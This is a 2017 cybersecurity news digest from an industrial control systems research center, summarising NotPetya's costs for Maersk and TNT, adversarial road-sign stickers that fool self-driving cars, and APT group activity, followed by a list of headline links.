Maersk Previews NotPetya
Impact: Up to $300 Million
Self-Driving Cars Can Be Hacked By
Just Putting Stickers On Street Signs
Updates to Sofacy,
Turla Highlight 2017 Q2 APT Activity
Customers 'furious' with TNT after
Cyber Security NewsLatest
Cyber Security News
about the Cyber Security
The Cyber News Update is an
activity of the Cyber Research Center - Industrial Control Systems and
intended to reach out to all Cyber Security Professionals interested in
industrial / critical infrastructure threats, protection &
resilience. For more information visit the CRC-ICS website at www.crc-ics.net or www.cyber-research-center.net
Maersk Previews NotPetya Impact: Up to $300
August 17, 2017
shipping giant A.P. Møller - Maersk faces a
loss of up to $300 million as a result of the NotPetya
global malware outbreak.
NotPetya infected systems at Maersk, the
world's biggest shipping firm had to reroute ships and was unable to dock
or unload cargo ships in dozens of ports.
the last week of the quarter we were hit by a cyberattack, which mainly
impacted Maersk Line, APM Terminals and Damco,"
Maersk CEO Søren Skou,
said in an interim report issued Wednesday. "Business volumes were
negatively affected for a couple of weeks in July. We expect that the
cyberattack will impact results negatively by $200-$300 million."
malware known as NotPetya - aka SortaPetya, Petna, ExPetr, GoldenEye, Nyetya, Diskcoder.C - hit
organizations beginning June 27. Cyber police in Ukraine, as well as such
security firms as Cisco Talos, ESET, Microsoft
and Symantec, have said the attacks were facilitated by a "cunning
backdoor" added to widely used accounting software (see NotPetya Patient Zero: Ukrainian Accounting Software
there, NotPetya spread to businesses with
Ukraine-based offices or business partners, in part by targeting an SMB
flaw that Microsoft had patched prior to the NotPetya
outbreak. But NotPetya could also spread via
two legitimate Windows tools - PsExec and
Windows Management Instrumentation - as well as use the open source Mimikatz tool to attempt to steal passwords from
infected systems (see Ransomware Smackdown: NotPetya Not as Bad as WannaCry).
Ukraine Hit Hard
in Ukraine, including government agencies, appear to have experienced the
brunt of NotPetya infections. The Ukrainian
government has yet to detail in full the costs, outages or cleanup - some of which likely continues. But it has
blamed the attack on Russia.
Ukraine, Russia, Poland, Italy and Germany appeared to suffer the
greatest number of related infections, according to security firm
around the world, however, were disrupted. They include Britain's WPP -
the world's biggest advertising agency, Russian oil giant Rosneft, international law firm DLA Piper and French
construction materials company Saint-Gobain.
U.S.-based organizations also reported disruptions, including snacks
business Mondelez, whose brands include Oreos,
Cadbury and Toblerone; pharmaceutical giant
Merck; and Pennsylvania-based Heritage Valley Health System.
Maersk Lauded for
some, however, Maersk has been ultra-transparent about its NotPetya disruptions and cleanup
efforts. The company first warned on June 28 that it had been hit by NotPetya and has continued to issue regular updates.
Hypponen, chief research officer of Finnish
security firm F-Secure, last month said Maersk exemplifies the right way
to handle crisis communications. Its choice to emphasize transparency
also stands in sharp contrast to how many firms, even publicly traded
ones, choose to handle post-attack communications with customers or
users, whether as a result of NotPetya or other
incidents (see Breach Transparency Kudos to Hacked Kiosk Maker).
Crisis communication experts, take
note. The Maersk case is going to be textbook material on how to do it
right. #Petya https://t.co/byyg2MBLoO
— Mikko Hypponen (@mikko) July 12,
More Cleanup Costs Come to Light
Maersk may be on the leading edge of communicating its NotPetya incident response efforts, further details
about other organizations' disruptions and incident response efforts
continue to come to light.
More info https://www.bankinfosecurity.com/maersk-previews-notpetya-impact-up-to-300-million-a-10203
August 7, 2017
Car Hacking is a hot topic, though it’s not new
for researchers to hack cars. Previously they had demonstrated how to
hijack a car remotely, how to disable car’s crucial functions like
airbags, and even how to steal cars.
But the latest car hacking trick doesn’t require
any extra ordinary skills to accomplished. All it takes is a simple
sticker onto a sign board to confuse any self-driving car and cause
Isn’t this so
A team of researchers from the University of
Washington demonstrated how anyone could print stickers off at home and
put them on a few road signs to convince “most” autonomous cars into
misidentifying road signs and cause accidents.
According to the researchers, image recognition
system used by most autonomous cars fails to read road sign boards if
they are altered by placing stickers or posters over part or the whole
road sign board.
In a research paper, titled “Robust
Physical-World Attacks on Machine Learning Models,” the researchers
demonstrated several ways to disrupt the way autonomous cars read and
classify road signs using just a colour printer
and a camera.
By simply adding “Love” and “Hate” graphics onto
a “STOP” sign (as shown in the figure), the researchers were able to
trick the autonomous car’s image-detecting algorithms into thinking it
was just a Speed Limit 45 sign in 100 percent of test cases.
The researchers also performed the same exact
test on a RIGHT TURN sign and found that the cars wrongly classified it
as a STOP sign two-thirds of the time.
The researchers did not stop there. They also
applied smaller stickers onto a STOP sign to camouflage the visual
disturbances and the car identified it as a street art in 100 percent of
“We [think] that given the similar appearance of
warning signs, small perturbations are sufficient to confuse the
classifier,” the researchers told Car and Driver. “In future work, we
plan to explore this hypothesis with targeted classification attacks on
other warning signs.”
The sign alterations in all the experiments
performed by the researchers were very small that can go unnoticed by
humans, but since the camera’s software was using an algorithm to
understand the image, it interpreted the sign in a profoundly different
This small alteration to the signs could result
in cars skipping junctions and potentially crashing into one another.
Read more http://thehackernews.com/2017/08/self-driving-car-hacking.html
Updates to Sofacy, Turla
Highlight 2017 Q2 APT Activity
August 8, 2017.
Attackers behind advanced persistent threat
campaigns have kept busy over the past several months, adding new ways to
bypass detection, crafting new payloads to drop, and identifying new zero
days and backdoors to help them infect users and maintain persistence on
Juan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky
Lab’s Global Research and Analysis Team, described some of tactics the
researchers have seen in Q2 2017 in a webinar Tuesday morning. The
company used the webinar and the quarterly report it was based on to help
pull back the veil on threats previously covered by its private intelligence
A chunk of the presentation
was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.
Sofacy, the group implicated by a
December DHS report to election hacks, began using two new macro
techniques in April. One abused Windows’ certutil
utility to extract payloads—the first time the researchers had seen that
technique used—another embedded payloads in the EXIF metadata of
malicious Office documents.
“After we started digging
into this we found that they were actually using this technique dating
back to December 2016,” Bartholomew said, adding that what made the
techniques interesting is that they were used to target French political
party members prior to the French election on April 23 and May 7.
In June, the researchers
noticed that Sofacy had updated a payload,
written in Delphi, called Zebrocy. The new
iteration, version 5.1 of Zebrocy, implemented
new encryption keys and minor string obfuscations, something which helps
it bypass detection capabilities, Bartholomew said.
Bartholomew said the
researchers were able to tie Zebrocy to Sofacy in mid-2016.
“There were some
infrastructure ties there,” Bartholomew said, “There was also another
payload called Delphocy that was also written
in Delphi. In late 2015 we started seeing Delphi payloads pop up from
this group, which we hadn’t seen before. We don’t know why that’s the
case, it could be that they hired a developer who just refuses to write
anything but Delphi. Either way, once Zebrocy
was discovered, it was found in parallel to another Sofacy
infection, once we started digging into it there was a little bit of
shared code in the Delphi—compared to the other Delphocy
payload—and ties to the infrastructure to Sofacy.”
Earlier this spring
researchers said they were able to make a potential link between Turla, the APT linked to Moonlight Maze at SAS
earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day
(CVE-2017-0261) to target foreign ministries and governments.
“What’s interesting about
that is that it may actually indicate a shared supply chain between Turla and Sofacy,”
Bartholomew also took time
on Tuesday to discuss BlackOasis, a Middle
Eastern-speaking group that’s believed to be a client of Gamma Group, the
UK-based firm that specializes in surveillance and monitoring equipment,
such as FinFisher.
He claims the group, which
he’s spent the better chunk of a year and a half researching, has been
spotted using several zero days in the past, including CVE-2016-4117,
CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it
interesting is that the group was the first seen using CVE-2017-0199, an
OLE2Link zero-day, in the wild before it was detected. The exploit’s end
payload, he adds, is a new variant of FinSpy
heavily fortified to prevent analysis by researchers.
“We’re currently trying to
look into that, write some decryptors for it
and will probably write another report on that in the next couple of
months,” Bartholomew said.
Citing their technical
sophistication and development, Guerrero-Saade
was eager to discuss a crop of English speaking APT actors, including
those behind an Equation Group backdoor, EQUATIONVECTOR. While the
backdoor has been around since 2006, Guerrero-Saade
said what makes it interesting is the fact that it’s the first example of
a NOBUS—NObody But US backdoor—they’ve seen in
the wild. The backdoor, a passive and active staging backdoor, could be
used to execute shellcode payloads, according to the researcher.
Another backdoor, Gray
Lambert—an extension of the Lamberts APT group—is much more modern
implementation, Guerrero-Saade said. It waits,
sleeps, and sniffs the network until it’s ready to be used.
“What makes this NOBUS
backdoor particularly interesting is that it provides attackers with a
sort of surgical precision over a network of multiple infected machines,”
Guerrero-Saade said. “With Gray Lambert
installed on these machines [attackers] can essentially decide how
they’re going to space their payloads, their commands and attacks.”
The researchers suggest
that users should expect more of the same tactics, techniques, and
procedures (TTPs) from APT groups going forward. It’s likely countries
that have upcoming elections, Germany and Norway for example, will become
targets for misinformation campaigns like the one mounted by the Sofacy group. Controversial lawful surveillance
tools, like those peddled by the Gamma Group to BlackOasis
and those sold by the NSO Group to the Mexican government, will remain
popular as well, Guerrero-Saade and Bartholomew
The trend of destructive
malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it’s a curious question whether
or not the technique will ever be embraced by cybercriminals.
“We’ve been talking about
incompetent people entering the ransomware space for a quite some time
now,” Guerrero-Saade said, “We’re going to see
people who are poor coders and won’t even bother to buy an already
prepared kit, just essentially trying to leverage something that deletes
all the files, or doesn’t do anything but tries to get money out of naïve
or unsuspecting victims. The notion of wipers as ransomware is quite
different. It’s an interesting phenomenon.”
“Sabotage attacks and wiper
attacks are a strange occurrence, they don’t happen that often. I think
over the past 10 years we’ve looked at 10 cases tops. They’re very rare
components. For the most part I think it has to do with the level of
access that you’re burning whenever you use them,” Guerrero-Saade said, “If you’re a cyberespionage actor, if you
have access to a network at that point, a Sony or Saudi Aramco, where you
can target thousands of machines, the idea of burning that loudly,
raising the security profile of the organization as a whole and creating
public fallout is extremely costly. It’s a strange circumstance where the
calculus pays off.”
While it may not be a
popular technique for cybercriminals on a lower level, Guerrero-Saade said, it’s not out of the realm of possibility
for APT gangs to continue to use the vector to create havoc.
“Let’s say we have all the
means for a sabotage attack and we want to disguise it as ransomware or
as something potentially treatable, it’s not necessarily that different
from what the Lazarus Group did with Sony, or some other South Korean
targets, where first they asked for money and then dumped data anyways.
It’s an evolution that’s particularly troubling,” Guerrero-Saade said.
More Info https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/
with TNT after cyber-attack meltdown
August 9, 2017.
When Leah Charpentier
ordered a vintage coffee table, on 8 June - a birthday present for her
brother - she didn't think it would take more than six weeks to be
She also didn't expect for the furniture to
arrive with one of its casters broken off.
This particular coffee table was just one of
hundreds of thousands of items caught up in an extraordinary meltdown at
courier TNT, which was badly affected by the NotPetya
cyber-attack that hit many companies around the world on 28 June.
Businesses in Ukraine were hit hardest, and
since many TNT operations and communications are based in the country, a
significant proportion of its systems were infiltrated and data encrypted
- locking employees out - as a result.
"Manual processes" are still being
used to put packages through the system, and TNT says it is
"reasonably possible" that some information will never be fully
The BBC has spoken to several customers who
have had exasperating experiences with the courier, which is owned by
Small businesses have been affected too - some
say they have lost thousands of pounds because of missing or waylaid
And a source close to FedEx and TNT operations
in Europe has told the BBC that depots have been pushed to their limit
while both companies continue to try to get the backlog of packages under
table faced the disruption of the cyber-attack after its initial delivery
had been delayed because of its size.
But when it arrived late to its destination in
London following the extended delay, her brother was not expecting the
delivery and so was out at the time. The furniture was shipped back to
Rome and then sent out again via another courier, DHL.
Ms Charpentier still
doesn't know who is responsible for the broken leg, but because of the
confusion and the fact that the table was sent back to Italy without TNT
contacting her first, she says: "I'm still furious at TNT."
Total shipping costs were 150 euros (£135),
and Ms Charpentier says she might have to spend
a further 180 euros to get the furniture repaired.
Since the cyber-attack, FedEx itself has been
processing large volumes of orders as a contingency, but the BBC
understands that this has put a huge strain on the company's
A source with knowledge of operations in
Europe says that until very recently some depots were finishing the day
with tens of thousands of packages still waiting to be processed, instead
of just a handful as usual.
"They didn't have enough loading units to
face this," the source says. "It was crazy."
The source adds that some physical hardware -
such as conveyor belts - was having to be fixed much more frequently than
usual because of the stress caused by increased volumes.
And at one point, staff had to use WhatsApp
Messenger for internal communications as company email was inaccessible,
the source adds.
'Medical supplies delayed'
The sheer range of customers affected by the
breakdown in operations at TNT is staggering - some were left distraught
as critical supplies were held up in transit.
"We have urgent air freight stuck at
Stansted [airport]," wrote one woman on the courier's Facebook page,
"medical equipment required in theatres."
In another case, TNT narrowly missed depriving
a bride of her dress on her wedding day, according to the staff at Dolly
Blue Bridal Studios in Shrewsbury.
"It was just a complete nightmare,"
says Adele Nortcliffe.
After many calls to trace missing deliveries,
TNT eventually sent an overnight courier to deliver the dress.
"We got a dress on the Thursday and the
wedding was on the Saturday," Ms Nortcliffe
Others haven't been so lucky.
Mark Hammersley runs Staffordshire Wrought
Iron, a small business that makes gates and other metal fittings.
"We lost £900 on Monday," he says,
describing how customers who are unable to track orders - a side-effect
of the IT issues - have been able to claim refunds via PayPal but also
keep their items if they do arrive.
Despite having used TNT for six years, Mr
Hammersley says he is now planning to switch couriers.
The list of cases goes on. One student told
the BBC that after their computer had broken they ordered new memory to
fix it so they could finish an assignment on time.
When it was delayed, they had had to borrow a
friend's laptop to meet the deadline.
And one man waited a month for a shower screen
that was supposed to arrive within five days - it materialised only after
a series of poorly co-ordinated delivery attempts.
It's nearly a month and a half since NotPetya struck, but TNT has still not recovered
The last update from the company was published
on 17 July. It said all TNT depots, hubs and facilities were operational,
but added: "Customers are still experiencing widespread service and
invoicing delays, and manual processes are being used to facilitate a
significant portion of TNT operations and customer service functions.
"We cannot estimate when TNT services
will be fully restored."
A spokesman for an online cycling retailer
told the BBC it was shipping freight beyond Europe via another courier,
as TNT had said only deliveries within the EU could be processed.
After the BBC contacted TNT for comment on 7
August, the company sent through some lines copied almost verbatim from
its 17 July notice, adding: "We cannot express strongly enough how
much we appreciate our customers' patience and understanding through this
Individuals at Risk
Suck Up Data About You. Where Does It All Go?: Automakers, local governments, retailers, insurers and tech
companies are looking to leverage the data that cars generate. New
York Times, July 27, 2017
Android malware records calls, intercepts texts, and steals credit card
info: A new version of Faketoken was
identified by Kaspersky and poses a huge threat to anyone who stores bank
card information for in-app purchases. TechRepublic,
Aug 18, 2017
your smartphone? Replacement parts can hijack phone security, steal
passwords: Booby-trapped touchscreens can log passwords, install malicious
apps, and more. Ars Technica, Aug 18, 2017
Information Security Management in the Organization
Information Security Management and Governance
Hack Illustrates That It’s Hard to Tell Exactly What’s Been Compromised: There may be much more missing than the headlines suggest. Robert
Braun, SecureTheVillage Leadership Council,
Cybersecurity Lawyer Forum, Jeffer Mangels Butler & Mitchell, Aug 17, 2017
Survey Finds Failure to Remove Access from ex-Employees a Major
Contributor to Breaches: Businesses drive the risk for data breaches when they fail to
terminate employees’ access to corporate apps after they leave. DarkReading, Aug 18, 2017
Cyber breach at shipper illustrates
dangers of business email compromise: Weak defences are leaving cargo vessels vulnerable to
cyber-attacks, say experts. BBC, Aug 18, 2017
The importance of network segmentation
as a key network security strategy: Cybercrime is getting worse. Keep your company safe by
following the latest recommendations in network security. Inc, August 18, 2017
Caution advised with information
security surveys: Cybersecurity reports based on answers from respondents
often produce misleading or inaccurate statistics, and they can lead to
industry confusion. CSO, August 15, 2017
found exploiting a vulnerability that Microsoft patched in April. Update
now!!!: Attackers are targeting companies, and their goal is to get their
hands on information that will allow them to steal money from the
victims’ accounts. HelpNetSecurity,
Aug 18, 2017
in New York and Colorado Cybersecurity Regulations: For the first time since New York’s Cybersecurity Regulation
(23 NYCRR Part 500) became effective on March 1, 2017, the Department of
Financial Services (DFS) has issued Frequently Asked Questions to assist
Covered Entities in their compliance and provide guidance into the DFS’s
interpretation and enforcement of its newly adopted regulation. National
Law Review, Aug 18, 2017
Cyber Security in Society
says impact of NotPetya may be as much as $300
Million: Danish shipping giant A.P. Møller –
Maersk faces a loss of up to $300 million as a result of the NotPetya global malware outbreak. BankInfoSecurity,
Aug 17, 2017
Department wants data on anti-Trump protesters. An L.A. tech firm is
resisting: Los Angeles tech company is resisting a federal demand for more
than 1.3 million IP addresses to identify who visited a website set up to
coordinate protests on President Trump’s Inauguration Day — a request
whose breadth the company says violates the Constitution. LA Times,
Aug 15, 2017
the New York hospital hackers took down for six weeks (video): The medical industry is the new No. 1 target for hackers. CBS
News, Aug 18, 2017
Macie automates cloud data protection with machine learning. Can it catch
Microsoft and Google?: Amazon promises AWS S3 customers that they will be able to
identify and protect sensitive data faster with Macie, but is it enough
to catch up to what Microsoft and Google offers? CSO, Aug 17, 2017
LA launches public-private CyberLab to share threat information with region’s
businesses: The new tech platform and public-private partnership aims to
protect critical IT infrastructure and aid businesses to fight
cyberattacks in real time. StateScoop,
Aug 16, 2017
Know Your Enemy
cloud cybersecurity attacks up 300% in last year, report says: In volume 22 of Microsoft’s Security Intelligence Report, the
Redmond giant outlined some of the biggest cyberthreats
facing its users. TechRepublic, Aug
Ukraine, a Malware Expert Who Could Blow the Whistle on Russian Hacking: For the first time, an actual witness has emerged in the hack of
the Democratic National Comittee, and he has
been interviewed by the F.B.I. New York Times, Aug 16, 2017
New York Times get the story wrong about Ukraine malware expert: It’s a good read, as long as you can ignore that the premise of
the piece is completely wrong. KrebsOnSecurity,
Aug 18, 2017
Backup of Chicago Voter Roll Found in Cloud. 1.8 Million Voter Records
At-Risk: Voter registration data belonging to the entirety of Chicago’s
electoral roll—1.8 million records—was found a week ago in an Amazon Web
Services bucket configured for public access. ThreatPost,
Aug 18, 2017
APT Group Said to Be Engaged in G20 Themed Attack: Turla, a long operating advanced
persistent threat group (APT) with presumed ties to the Russian
government, appears to be actively targeting G20 participants and those
interested in its activities including policymakers, member nations and
journalists. DarkReading, Aug 18,
cybersecurity review for state and local government approaches: Non-federal agencies still ride low on the maturity benchmark,
but the increased political attention around cybersecurity could improve
results in the coming survey period. StateScoop,
Aug 18, 2017
Why information security is a patient safety issue: Cybersecurity requires strategy to succeed and that means putting
your priorities in the right place. CISOs and other infosec
pros must up their game to make protecting patients the top concern. Healthcare
IT News, Aug 15, 2017
The content of this CRC-ICS Cyber
News Update is provided for information purposes only. No claim is made
as to the accuracy or authenticity of the content of this news update or incorporated
into it by reference. No responsibility is taken for any information or
services which may appear on any linked websites. The information
provided is for individual expert use only.
Founded in 2015, the Cyber Research Center
- Industrial Control Systems is a not for profit research &
information sharing research center working on the future state of
Physical & Cyber Protection and Resilience. CRC-ICS goals are to
inform industries / critical infrastructures about the fast changing
threats they are facing and the measures, controls and techniques that
can be implemented to be prepared to deal with these cyber threats.